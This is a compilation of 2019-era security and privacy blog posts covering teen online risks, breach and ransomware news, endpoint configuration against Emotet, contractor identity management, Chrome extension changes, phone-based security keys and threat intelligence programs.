    What you can do: Don’t ignore the signs of excessive gaming, which include preoccupation with gaming, anger, irritation, lying to cover playing time, withdrawal and isolation, exchanging sleep for gaming. Be swift and take action. Set gaming ground rules specific to summer. Consider parental control software to help with time limits. Remember: Kids love to circumvent time limits at home by going to a friend’s house to play video games. Also, plan summer activities out of the house and away from devices.
  3. Cyberbullying. Making fun of others, threatening, name-calling, exclusion, and racial or gender discrimination are all serious issues online. With more time on their hands in the summer months, some kids can find new ways to torment others.
    What you can do: Listen in on (monitor) your child’s social media accounts (without commenting or liking). What is the tone of your child’s comments or the comments of others? Pay attention to your child’s moods, behaviors, and online friend groups. Note: Your child could be the target of cyberbullying or the cyberbully, so keep your digital eyes open and objective.
  4. Smartphone anxiety. Anxiety is a growing issue for teens that can compound in the summer months if left unchecked. A 2018 survey from the Pew Research Center reveals that 56 percent of teens feel anxious, lonely, or upset when they don’t have their cell phones.
    What you can do:
    Pay attention to your child’s physical and emotional health. Signs of anxiety include extreme apprehension or worry, self-doubt, sleeplessness, stomach or headache complaints, isolation, panic attacks, and excessive fear. Establish screen limits and plan phone-free outings with your child. Set aside daily one-on-one time with your child to re-connect and seek out professional help if needed.
  5. Social Conflict. More hours in the day + more social media = potential for more conflict. Digital conflict in group chats or social networks can quickly get out of hand. Being excluded, misunderstood, or criticized hurts, even more, when it plays out on a public, digital stage.
    What you can do: While conflict is a normal part of life and healthy friendships, it can spiral in the online space where fingers are quick to fire off responses. Offer your child your ears before your advice. Just listen. Hear them out and (if asked) help them brainstorm ways to work through the conflict. Offer options like responding well, not engaging, and handling a situation face-to-face. Avoid the temptation to jump in and referee or solve.

Summer doesn’t have to be stressful for kids, and the smartphone doesn’t have to win the majority of your child’s attention. With listening, monitoring, and timely coaching, parents can help kids avoid common digital risks and enjoy the ease and fun of summer. 

The post 5 Digital Risks to Help Your Teen Navigate this Summer appeared first on McAfee Blogs.

Cyber News Rundown: Radiohead Hit by Ransomware Hack

Reading Time: ~ 2 min.

Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

The account information was leaked for over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming related. The breach, which took place in April of 2018, affected 1.1 million IP and email addresses, many of which were found in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user data it’s clear EmuParadise could have done more to properly secure their users information.

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

Weekly Update 143

Weekly Update 143

Well this was a big one. The simple stuff first - I'm back in Norway running workshops and getting ready for my absolute favourite event of the year, NDC Oslo. I'm also talking about Scott's Hack Yourself First UK Tour where he'll be hitting up Manchester, London and Glasgow with public workshops. Tickets are still available at those and it'll be your last chance for a long time to do that event in the UK.

Then there's Project Svalbard. I think it'll come across in the video below, but putting a project I've poured my heart and soul into over the last 5 and half year up for sale is a massive thing for me. There are so many emotions involved at so many levels and I really wanted to try and get that across in a more personable form than what written word lends itself to. I hope I've done that, and I hope you enjoy listening to the back story of Project Svalbard. Here it is:

Weekly Update 143
Weekly Update 143
Weekly Update 143

References

  1. Scott's public Hack Yourself First UK Tour is coming up (Manchester, London and Glasgow - get on it!)
  2. Project Svalbard (the big one - this is a long weekly update mostly about my decision to move HIBP into another organisation)
  3. Twilio is sponsoring my blog this week (learn what regulations like PSD2 mean for your business, and how Twilio can help you achieve secure, compliant transactions)

Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity

Aunty, do you happen to have any waste paper at home? I need them for my Environment Day project,” chirped a bright little thing standing at my door early Sunday morning.

I am sure I have. What is your project this year?”

Oh! I want to emphasize on ‘Reduce. Reuse. Recycle.’ by making durable paper bags that people can pack their gifts in. It will also reduce the use of plastic.”

We need more such efforts on the part of all producers, consumers and recyclers to restore the balance on earth, which we have sadly turned into a dump yard of toxic waste that is polluting our land, water and air. The matter is serious and calls for judicious purchase and use of goods.

This Environment day, why not pledge to reduce e-waste, digital citizens?

What is e-waste?

Electronic waste or e-waste describes discarded electrical or electronic devices. Used electronics which are destined for refurbishment, reuse, resale, salvage, recycling through material recovery, or disposal are also considered e-waste.

Which means all your obsolete devices and electronic goods, that are lying around at home or been thrown away in bins, make up e-waste.

Why is there a rise in e-waste?

The volume of annual e-waste is on the rise, thanks to the desire for latest models fueled by the rise in disposable income, technological progress and cheap data rates. Gone are those thrifty days when we purchased goods to last; now we want only the smartest and latest.

Consider this: The Global E-Waste Monitor, 2017 published by the United Nations University estimated that India generates about 2 million metric tons of e-waste annually, of which almost 82% comprises of personal devices!

Why are we worried about e-waste?

We want the Earth to continue being the clean, green and beautiful planet that it is, right? But the increasing amount of e-waste is a threat to the environment. If not processed properly, it can have negative effects on pollution levels and consequently on the health of all life forms. Toxicity in soil will affect soil fertility, and hence crop production. We have already witnessed the effect of plastics and toxic fumes from incinerators on birds and animal life.

How is e-waste connected to cybersecurity?

Improper disposal of devices can also pose a security risk. If you have not taken the trouble to delete all the content and reset to factory settings, then your data, including photos may fall in wrong hands and could be misused. Before you give or throw away old devices, take care to thoroughly clean content and unsync from other devices.

How to reduce e-waste?

This is your Environment Day Mantra: Reduce. Recycle. Refurbish. Reuse.

Every time you desire to replace an electronic item, ask yourself, ‘Is it really necessary to purchase it now or can it be postponed? Am I doing it to keep up with or ahead of the Joneses? What will I do with the old product?’ Such soul-searching often leads to sane decisions that you will not regret later.

With that in mind, and the following tips handy, you can become a positive contributor to keeping the environment clean.

  1. Keep your devices in top condition: The two most common devices to be found in homes across India are the computer (or laptop) and smartphone. Replace slow batteries and keep them secured. Carry out regular scans and clean-ups and install all software updates.
  2. Protect your phone from damage: Use a screen guard and phone cases to reduce chances of breakage. Your kids can choose trendy cases that will serve two purposes: protect their phones as well as encourage them to use the devices for a longer period
  3. Battery life: Avoid overcharging the battery to extend battery life
  4. Secure your products: Use licensed security tools to remove malware and optimize performance

Some countries offer financial incentives to return old devices at designated collection centres. Perhaps we should start something like this to encourage people to recycle?

Things You Can Do This Environment Day:

Still not found a suitable project for Environment Day? Why not go on a collection drive of gaming devices and mobile phones that your neighbours have lying at home. You can then clean them and get in touch with a reputed NGO to channel these gaming devices to children’s homes, domestic help and others. Think about it.

 

Credit

https://www.greenchildmagazine.com/reduce-ewaste/

https://tcocertified.com/news/global-e-waste-reaches-record-high-says-new-un-report/

https://www.downtoearth.org.in/blog/waste/e-waste-day-82-of-india-s-e-waste-is-personal-devices-61880

The post Stop Discarding Devices Frequently- It’s Risky for Mother Earth as Well As Your Cybersecurity appeared first on McAfee Blogs.

Fifty States, Fifty Laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty Laws appeared first on Privacy Ref Blog.

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats —and the data in this year’s DBIR show that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. And that makes sense, when you take the threat actors’ POV into account. Nefarious attackers know that small and mid-size businesses don’t have the cyber hygiene that’s expected of enterprise organizations. Yet, the personally identifiable information (PII) and the intellectual property of smaller organizations is just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too. The DBIR showed an increase in hackers’ focus to cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials AND can be prevented with better education amongst staff, paired with anti-phishing technology and managed security services. All affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick-off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program
 Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.

 

The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware

Customers often ask us how to implement the suggestions provided in our blogs and threat advisories to better protect their environments. The goal of this blog is to do just that.

By showing you how to better use our products, you’ll be able to protect against Emotet and other malware. Emotet is a Trojan downloader spread by malicious spam campaigns using JavaScript, VBScript, and Microsoft Office macro functions. It downloads additional malware and persists on the machine as a service. Emotet has been observed to download ransomware, mass-mailing worms, W32/Pinkslipbot, W32/Expiro, W32/Dridex, and banking Trojans.

NOTE: Always test changes prior to implementing them in your environment.

1. DATs and product updates

One of the most common issues seen while in Support was an outdated DAT.

2. Make sure you have at least one scheduled product update task in McAfee ePO to run daily.

3. On-Access Scan (OAS) configuration for McAfee Endpoint Security and McAfee VirusScan Enterprise

Ensure that On-Access Scan (OAS) is enabled and set to scan on read and write and that entire drives aren’t excluded from being scanned. McAfee Endpoint Security and McAfee VirusScan Enterprise allow you to configure different scan settings based on the process. You can enable “Configure different settings for High-Risk and Low-Risk processes” to improve performance and reduce the need for file/folder exclusions. See KB88205 for more information.

Be sure that Artemis/GTI is enabled and that the first scanner action is “Clean” and the second action is “Delete”.

NOTE: Setting Artemis/GTI to High or Very High should be done gradually and with testing to reduce the risk of false positives. See KB53735 for more information.

4. On-Demand Scan (ODS)

A weekly On-Demand Scan (ODS) is suggested to ensure that your systems don’t have malware or PUPs. Do not run an ODS during peak business hours, as users may complain about system performance.

5. Access Protection (AP)

While the default Access Protection (AP) rules provide decent coverage, both McAfee Endpoint Security and McAfee VirusScan Enterprise allow for the creation of user-defined rules to prevent infection and the spread of worms or viruses. Below are some pre-created ones that should be tested and enabled in your environment to provide additional protection.

Pre-Defined Rule:

  • Disabling Registry Editor and Task Manager — Certain malware may attempt to disable the Task Manager to prevent the user from terminating the malicious process. Enable this AP rule to prevent the Task Manager from being disabled.

6. Access Protection (AP) rules for virus and worm outbreaks

These rules should only be enabled during a virus outbreak and for workstations only. Implementing the last two shown below may cause issues with file servers running McAfee VirusScan Enterprise or McAfee Endpoint Security. Always test these rules before you enable them:

  • Remotely Creating Autorun Files
  • Remotely Creating or Modifying Files or Folders
  • Remotely Accessing Local Files or Folders

NOTE: Only create a separate AP policy for workstations if you wish to continue using the AP rules below. Remotely creating files between workstations is unusual behavior.

7. User-defined AP file/folder patch locations

The user-defined rule below is one common location for malware.

8. Microsoft Office malware

Most threats come through email and are often downloaders for other malware. The AP rule below is intended to prevent Microsoft Office applications from executing PowerShell. You can include CScript.exe and WScript.exe as well.

9. McAfee Endpoint Security firewall

Almost all organizations have a firewall at the perimeter level. Some may opt to disable the built-in firewall on workstations and servers. The McAfee Endpoint Security Firewall is more comprehensive than the Windows firewall and can be used to prevent communication to malicious IPs and domains.

10. Blocking malicious traffic with the firewall

Blocking malicious network traffic prevents new variants from being downloaded and can minimize the impact on the environment. Environments that don’t block malicious traffic as one of the first steps often take longer to clean up.

The post Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware appeared first on McAfee Blogs.

Hack Yourself First – The UK Tour by Scott Helme

Hack Yourself First - The UK Tour by Scott Helme

It's the Hack Yourself First UK Tour! I've been tweeting a bit about this over recent times and had meant to write about it earlier, but I've been a little busy of late. Last year, I asked good friend and fellow security person Scott Helme to help me out running my Hack Yourself First workshops. I was overwhelmed with demand and he was getting sensational reviews for the TLS workshops he was already running. Since that time, Scott has run Hack Yourself First all over the world and done an absolutely sensational job of them. So, we decided to do a bunch in the UK and make them accessible to everyone:

  1. Manchester - 27th and 28th June
  2. London - 4th and 5th July
  3. Glasgow - 18th and 19th July

Tickets for the workshops are available at £1,250 + VAT for the 2 days which includes lunch and refreshments throughout. Scott has also arranged hotel packages in each location so if you need to stay over, there's one price you can send the boss that covers everything.

And finally, there's a shiny PDF flyer that includes all the details in one document:

Hack Yourself First - The UK Tour by Scott Helme

If you're in the UK (or can get to the UK), reach out to Scott on training@scotthelme.co.uk and he'd love to get you booked in for a couple of days of Hack Yourself First.

Privacy Comes at a Price

At Apple’s World Wide Developers Conference last week, the message was all about Privacy. Apple has been more privacy-minded than other tech companies – that’s not news and it’s why I have an iPhone. They’ve introduced some interesting privacy features, such as showing location tracking, which I think is pretty cool. I don’t leave my […]

The post Privacy Comes at a Price appeared first on Privacy Ref Blog.

How to Manage Identities for Contractors, Consultants, and Other Non-Employees

English

For years, organizations have recognized the need to pay close attention to and manage the access that their employees have with the help of identity governance and administration solutions.  More recently, organizations are also being faced with the reality that they need to apply the same level of governance to non-employees as well. According to a 2018 Opus-sponsored Ponemon study, 59 percent of companies said they have experienced a data breach caused by one of their vendors or third parties. Many of these breaches go undetected. With most organizations agreeing that third-party cybersecurity incidents are on the rise, non-employee access management is more important than ever.   

Access by non-employees like contractors, vendors, students, or consultants face additional challenges when it comes to entitlements. How does an organization ensure that a non-employee can get into the systems they need to do their job, while still enforcing enough limitations to avoid becoming a security risk? Read on to learn more about why non-employees present a unique challenge to identity and access management programs, how industries like healthcare handle managing their privileges, and best practices to find the balance between granting permissions and reducing risk.

What makes access for non-employee so challenging?

Non-employees often need to be onboarded quickly, since they may only be temporary members of the organization. Contractors or consultants, for example, need to quickly be able to log on and get to work. Organizations with no identity governance and administration (IGA) solution, or a very limited identity and access management (IAM) program, likely do not have a way to easily limit access or keep track of those with non-employee status. Oftentimes there is no “non-employee” designation in the system, or security teams lack a centralized inventory of users, allowing atypical IDs to slip through the tracks. .

Even businesses with IGA solutions may end up quickly classifying consultants as employees as far as IT is concerned. Since these roles are typically not vetted as thoroughly as a full-fledged employee would be, giving them standard access may open the door to serious security issues. Providing a contractor with full employee access defies the principle of least privilege, since contractors don’t require access to nearly as many systems and applications but will be able to log into them anyway.

Additionally, non-employees may be not be working in your specific infrastructure as often, making them more prone to mistakes, making full access to sensitive information or data particularly risky. Some of the largest breaches have come from stolen non-employee credentials that allowed a hacker to get in through the front door.

Finally, non-employees tend to come and go far more frequently than employees, leaving behind an unused, but still active account. These orphaned accounts are key targets for threat actors looking for a way to get inside a system without setting off any alarms. Since the owner of the account isn’t using it, it may be too late before it’s noticed that it’s being utilized for malicious purposes.

Best practices for non-employee access

Luckily, there are a few tangible ways to solve the potential challenges related to non-employee access. An organization with a solid IGA program can safeguard their infrastructure by a few important guidelines:

  1. Have a way to identify and manage non-employees.

There are many ways to manage non-employees. For example, you could add non-employees to your HR system, segment them appropriately, and manage their contract status. If this is not possible within an organization, the right IGA solution can be configured to be the central repository for non-employee identities and have convenient methods for inputting relevant information about them as well as enforce appropriate controls to manage them more closely.

Whatever approach an organization chooses, the most important part is to regularly ensure these non-employee user accounts are correct and up to date. The work of a contract employee can often vary depending on the project. Without regular check-ins, entitlement creep and orphaned accounts may begin to occur. That is, a contractor simply gains additional access without removing privileges they no longer need, or the account is left active after the contractor has left the organization.

  1. Follow the principle of least privilege.

All IGA identity governance and administration programs should begin with the principle of least privilege. That is, no employee or non-employee should have more access than needed to get their job done. This is best achieved through role-based access, which provides permissions based on roles, instead of individual entitlements.  Roles can easily be applied to well-managed non-employees as well as employees.

  1. Have processes in place for efficient, but accurate onboarding and offboarding.

Manual provisioning can be labor intensive and take weeks before a new employee has access to every area they’ll need. This can lead to a frustrating experience for both the employee and non-employee and will cost the organization time and money. However, sloppy onboarding for the sake of speed can lead to security risks. While off boarding does not seem as time sensitive since no one is waiting on access, it is even more important from a security perspective.

 

Use Case: Non-Employees in Healthcare

Healthcare is a perfect example of an industry that needs to have a comprehensive yet flexible way of managing non-employees. It is highly regulated industry with a significant number of non-employees  Potentially challenging use cases include the following:

Providers

Many doctors and clinicians that work in hospital systems are not actually employed by the hospitals themselves. They may be employed by a clinic or medical group that has established a partnership allowing them privileges at the hospital.

While they may not be official employees, this group need access to many of the systems within the hospital network. Not having access to scheduling software, communication applications, alerting systems, and of course, electronic health records (EHR) can put lives as risk. It is also important to make certain that the status of a physician’s relationship with the hospital is up to date and that access is removed when it is appropriate.

However, these doctors do not require access to employee portals that provide benefit and payment information or other human resources related applications. Granularity and visibility into the access via roles is important.

Physicians are perfect examples of a non-employee who will require longer term access, but do not require full access. Best practices and role-based access would ensure that regular entitlement reviews would renew this access as needed, verifying compliance without disrupting patient care.

Volunteers

Whether it be as part of a program to interact with and assist patients, or as part of an emergency response plan, hospitals often have a need to allow volunteers to have access to their resources and patient data. Some may be long-term; others may only last a week. Some come in large groups, others volunteer on their own. Regardless, volunteers still require a certain amount of access. It may be very minimal, perhaps to sign in to track hours and verify that they’re in the building.

With volunteers, it is imperative that their access be managed to a level corresponding with the significance of data they require. Most will not have any medical certifications and should not have any access to health records. It is important to consider the definition of roles for volunteers as well as a repository that can be used to understand their precise needs in relationship with the healthcare systems. Removing even minimal access for volunteers is important when it is no longer needed.

Medical Students

Medical students provide a unique middle ground between physicians and volunteers when it comes to access. While they need access to the EHR system, they may not require the privileges that nurses and doctors are entitled to. For example, a medical student may not need to be able to put through an order for a test or send a prescription to a pharmacy.

Administrators face additional challenges  because large groups of students typically start on the same day.  Since the window in which they will be working at the hospital is so short, it is important for them to have all of their access needs sorted by day one. Similarly, most students have a shared end date, so offboarding must also be well organized and efficient. Automated deprovisioning is ideal in this scenario, so that orphaned accounts don’t linger for longer than necessary. Continuous review is also still necessary in case a student drops out or transfers.

Managing Everyone with Core Access Assurance Suite

The best way to manage non-employees is with a robust IGA solution that can manage non-employees in addition to standard full-time employee. Core Access Assurance Suite provides the complete context of relationships between users, access rights, resources, user activity, and compliance policies so that you can efficiently provision a user appropriately from the beginning, using roles as necessary.

Automate the process of creating and managing non-employee accounts and identities as well as their associated access rights across the enterprise. Core Access Assurance Suite also ensures immediate disablement of access rights upon termination for increased security and regulatory compliance.

From long-term employees to short term contractors, our IGA solution will streamline access control and manage risk to provide a secure environment for your organization.

Core Access Assurance Suite provides complete identity, access risk, and compliance management, easily identifying, quantifying and managing the risks associated with information access.

cs-manage-identities-non-employees-blog-700x350.jpg

How to Manage Identities for Contractors, Consultants, and Other Non-Employees
Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Want to learn more about identity governance?

Find out how to manage identites for everyone in your organization with the Identity Governance Toolkit.

Improving Security and Privacy for Extensions Users

No, Chrome isn’t killing ad blockers -- we’re making them safer

The Chrome Extensions ecosystem has seen incredible advancement, adoption, and growth since its launch over ten years ago. Extensions are a great way for users to customize their experience in Chrome and on the web. As this system grows and expands in both reach and power, user safety and protection remains a core focus of the Chromium project.
In October, we announced a number of changes to improve the security, privacy, and performance of Chrome extensions. These changes include increased user options to control extension permissions, changes to the review process and readability requirements, and requiring two-step verification for developers. In addition, we’ve helped curb abuse through restricting inline installation on websites, preventing the use of deceptive installation practices, and limiting the data collected by extensions. We’ve also made changes to the teams themselves — over the last year, we’ve increased the size of the engineering teams that work on extension abuse by over 300% and the number of reviewers by over 400%.
These and other changes have driven down the rate of malicious installations by 89% since early 2018. Today, we block approximately 1,800 malicious uploads a month, preventing them from ever reaching the store. While the Chrome team is proud of these improvements, the review process alone can't catch all abuse. In order to provide better protection to our users, we need to make changes to the platform as well. This is the suite of changes we’re calling Manifest V3.
This effort is motivated by a desire to keep users safe and to give them more visibility and control over the data they’re sharing with extensions. One way we are doing this is by helping users be deliberate in granting access to sensitive data - such as emails, photos, and access to social media accounts. As we make these changes we want to continue to support extensions in empowering users and enhancing their browsing experience.
To help with this balance, we’re reimagining the way a number of powerful APIs work. Instead of a user granting each extension access to all of their sensitive data, we are creating ways for developers to request access to only the data they need to accomplish the same functionality. One example of this is the introduction of the Declarative Net Request API, which is replacing parts of the Web Request API.
At a high level, this change means that an extension does not need access to all a user’s sensitive data in order to block content. With the current Web Request API, users grant permission for Chrome to pass all information about a network request - which can include things like emails, photos, or other private information - to the extension. In contrast, the Declarative Net Request API allows extensions to block content without requiring the user to grant access to any sensitive information. Additionally, because we are able to cut substantial overhead in the browser, the Declarative Net Request API can have significant, system-level performance benefits over Web Request.


This has been a controversial change since the Web Request API is used by many popular extensions, including ad blockers. We are not preventing the development of ad blockers or stopping users from blocking ads. Instead, we want to help developers, including content blockers, write extensions in a way that protects users’ privacy.
You can read more about the Declarative Net Request API and how it compares to the Web Request API here.
We understand that these changes will require developers to update the way in which their extensions operate. However, we think it is the right choice to enable users to limit the sensitive data they share with third-parties while giving them the ability to curate their own browsing experience. We are continuing to iterate on many aspects of the Manifest V3 design, and are working with the developer community to find solutions that both solve the use cases extensions have today and keep our users safe and in control.

Use your Android phone’s built-in security key to verify sign-in on iOS devices


Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3


Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.

Improving Cyber Resilience with Threat Intelligence

According to the SANS CTI 2019 survey results, 72% of organizations either consume or produce Threat Intelligence. Although most organizations have Intelligence data, they struggle with defining requirements and managing Cyber Threat Intelligence (CTI) as a program with measurable output. This likely results from threat data and intelligence being perceived as a technical function unrelated to business objectives.

We need to change this perception.

In my opinion, the key business objectives most closely related to threat intelligence are Risk Management and Cyber Resilience. Threat Intelligence can influence the outcomes of both.

Cyber Resilience itself requires risk management and adaptability. The need for businesses to become more resilient is driving the demand for an adaptable security architecture—one that not only effectively leverages threat intelligence to improve Security Operations, especially Incident Response, but also adapts cyber defenses such as endpoint and network controls to prevent the latest threats.

Meanwhile, regulations focused on improving cyber security are driving a continuous risk management approach. For example, in 2016, the European Union released the NIS (Network and Information Systems) Directive, which provides a legal framework to boost the overall level of cybersecurity in critical industries and calls specifically for threat intelligence and incident sharing among organizations and national authorities. With these drivers in mind, we now need to design a managed process with the goal of creating an efficient way to increase the business value of CTI. We can define this process as follows:

  • Discovering the most valuable data sources
  • Using automation to collect, investigate, respond and share
  • Integrating CTI into cyber defense processes
  • Measuring to prove the value of Threat Intelligence

1. Collection, Deduplication and Aggregation

The first step in the CTI Management Process is the collection, deduplication and aggregation of the data or feeds. One of the main gaps at the enterprise level is the collection of local produced Threat Intelligence. Local Threat Intelligence includes data generated from analytics solutions like sandboxes and from incidents. Sandboxes usually produce intelligence data in the form of Indicators of Compromise (IOCs). These local sources could expose targeted attacks, and therefore are potentially the most valuable threat data source.

McAfee’s Open Architecture allows for the production, consumption and sharing of threat intelligence in various ways. Here is an example of how our architecture automates aggregation of various CTI sources with an open-source tool, MISP. The MISP platform subscribes to the McAfee Data Exchange Layer messaging fabric to consume IoCs from McAfee’s Advanced Threat Defense sandbox in real time. Additionally, MISP consumes and manages feeds from open or paid sources, providing an entry-level tool to manage the threat intel process.

Here is another example of how our architecture supports the aggregation process, this time by working with a commercial vendor, ThreatQ.

2. Investigation and Hunting

The second step in the CTI management process is investigation and hunting. Here, the biggest task is figuring out how to make Threat Intelligence actionable, which can be done by answering questions like:

  • Have we seen any related artifacts (IP address connections, Hash/File executions) in my enterprise in the past?
  • Do we have, right now, any devices that have related artifacts?

Before answering these questions, the right data must be collected from the enterprise sensors. Fundamental information should include IP address connections, file hashes on endpoints, web proxy, DNS and Active Directory logs. These logs provide the necessary data for correlation and historical analysis. The following example demonstrates how the architecture can automate some of the key triage steps.

MISP can push Threat Intelligence into McAfee’s SIEM solution, ESM (Enterprise Security Manager), to automate historical analysis. There, it can query McAfee’s Threat Intelligence Exchange server to identify which systems executed related artifacts, and where and when they did so. Furthermore, MISP can run real-time queries against McAfee-protected endpoints with McAfee Active Response to identify any persistent artifacts that are currently in the enterprise network.

Here is another example working with ThreatQ. This time, ThreatQ interacts with McAfee ESM, Active Response and McAfee TIE to identify systems that have or had artifacts related to Threat Intelligence indicators. These various integrations support manual enrichment task and investigations.

The screenshot below highlights the various McAfee integrations as part of an investigation.

3. Response

The third step in the CTI Management Process is response. Cyber Threat Intelligence is essential to prevent the latest threats and should be integrated into key cyberdefense countermeasures. The following example demonstrates an automated update process using McAfee’s Open Architecture, with the Data Exchange Layer (DXL) fabric as the key component.

ThreatQ can communicate via the DXL fabric with McAfee technologies. During this process ThreatQ is able to update key cyber defense countermeasure tools with Threat Intelligence to protect against the latest threats.

Another part of this process step is sharing threat intelligence with other parties, such as partners and communities. Most Threat Intelligence Platforms (open source and commercial) support various protocols for external CTI sharing. This includes TLP, STIX, TAXII and DXL. These protocols support the automated exchange and governance of the shared data.

Another part of this process step is sharing threat intelligence with other parties, such as partners and communities. Most Threat Intelligence Platforms (open source and commercial) support various protocols for external CTI sharing. This list includes TLP, STIX, TAXII and DXL, which feature protocols facilitating the automated exchange and governance of the shared data.

4. Measurement

Finally, the value of Threat Intelligence can be proven by measuring a variety of outcomes. The following are some of the metrics commonly quantified and reported on:

  1. Number of duplicate Threat Intelligence Artifacts removed
  2. Impact on Mean-Time-To-Respond
  3. Number of IOCs generated from Threat Intelligence
  4. Number of incidents identified based on Threat Intelligence
  5. Number of attacks blocked via Threat Intelligence

Summary

The creation and implementation of the right process is critical to the success of Cyber Threat Intelligence within the enterprise. In this blog, we defined a CTI management process of Collection, Investigation, Response and Measurement. McAfee’s research, management platform and open architecture enable you to implement this process and get the best value out of Cyber Threat Intelligence, promoting resilience and enabling better risk management.

Links to additional resources

The post Improving Cyber Resilience with Threat Intelligence appeared first on McAfee Blogs.

Harnessing Machine Learning and Automation against Advanced Threats

Estimated reading time: 2 minutes

With the specter of advanced cybersecurity threats always on the horizon, enterprises are seriously considering harnessing the power of machine learning and automation to fight against these threats. For good reason too – a cybersecurity survey suggested that organizations with an extensive use of automation rated themselves as much more likely to prevent, detect, respond and contain a cyber attack.

These concepts are getting increasingly important in today’s changing era of fast-growing cyber threats but what do they mean exactly? Machine learning basically refers to computers learning from data instead of receiving explicit programming. Through such machine learning algorithms, computers are fed huge datasets and parse through them to recognize patterns or co-relations through extended data analysis.

The importance of machine learning

Machine learning is becoming a common feature in more and more industries and cybersecurity has not lagged behind. An ABI Research report estimated that machine learning in cybersecurity will boost big data, intelligence and analytics spending to $96 billion by 2021. It is quite clear why there is such extended growth – machine learning allows business to offer a better response and bolster their own defense when it comes to the big, bad world of cyber threats. Security companies are rejigging the solutions they offer in tune with this trend. They are moving from signature-based systems to layered solutions where machine learning systems interpret data to better detect malware.

Some of these advantages are:

Making Sense of Data – The amount of data that can be collected for cybersecurity is humongous. While the sheer size and amount of data may be too much for humans alone to analyze, this is where machine learning can step in. By analyzing and processing big amount of data, it may be possible to find patterns or categories of certain behavior which can be used to fight advanced cybersecurity threats.

Using Automation for Better Protection – Different threats can have different attack points for an enterprise and even one threat may attack different touchpoints in different ways. This is where automation can do a much more effective job. By understanding the predicted behavior and touchpoints of a potential attack, automation can create better protection measures across touchpoints suited to exactly the type of predicted attack.

